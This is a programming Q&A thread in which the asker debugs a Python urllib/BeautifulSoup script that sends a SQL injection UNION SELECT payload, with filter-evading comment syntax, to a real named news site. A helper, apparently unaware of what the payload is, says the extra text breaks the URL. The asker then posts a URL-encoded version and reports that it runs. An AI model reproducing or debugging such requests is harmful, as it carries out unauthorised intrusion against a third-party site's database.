# return func(*args, **kwargs) ValueError: read of closed file

Tags: python, python-3.5, valueerror

```
from urllib.request import FancyURLopener
from bs4 import BeautifulSoup

class MyOpener(FancyURLopener):
    version = 'My new User-Agent'

myopener = MyOpener()

url3 = ("http://www.zamaninternational.org/news.php?n=71' /*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+")

url_oku3 = myopener.open(url3)
soup3 = BeautifulSoup(url_oku3, 'html.parser')
```

```
Traceback (most recent call last):
  File "untitled.py", line 13, in <module>
    soup3 = BeautifulSoup(url_oku3, 'html.parser')
  File "C:\Python37\site-packages\bs4\__init__.py", line 245, in __init__
    markup = markup.read()
  File "C:\Python37\lib\tempfile.py", line 481, in func_wrapper
    return func(*args, **kwargs)
ValueError: read of closed file
```

Comment: Your code is not well formatted? Is the return in or outside of the if?!

Comment: To help you we would probably need to now what `myopener` does. It probably closes your file instead of returning an open file handle. if you use the "with open() ... inside it it is autoclosed on returning from the function.

Comment: code update///////

Comment: Congrats - your code now lacks some closing string delimiter (hence why it is printed completely red). You still dont show what `myopener.open(...)`  actually does.

Comment: ı  understand now update

Comment: The definition of `url3` is invalid. How exactly did you initialize it?

Comment: url3= url not error

Answer (score 1):

The URL must be simply `"http://www.zamaninternational.org/news.php?n=71"`. It is the garbage in the rest of the line that hurts the opener.

Interestingly, the opener is still OK with `"' /*!UNION*/ /*!SELEC"`, but it chokes on whatever follows.

Comment: http://www.zamaninternational.org/news.php?n=71'/*!UNION*/ /*!SELECT*/ 1,2,3,4,5,6,7,8,9,10,11,12,13,14--+  why not to be?

Comment: Because it is not a valid URL.

Comment: thanky  http://www.zamaninternational.org/news.php?n=72%27%20/*!UNION*/%20/*!SELECT*/%201,2,3,4,5,6,7,8,9,10,11,12,13,14--+   run :)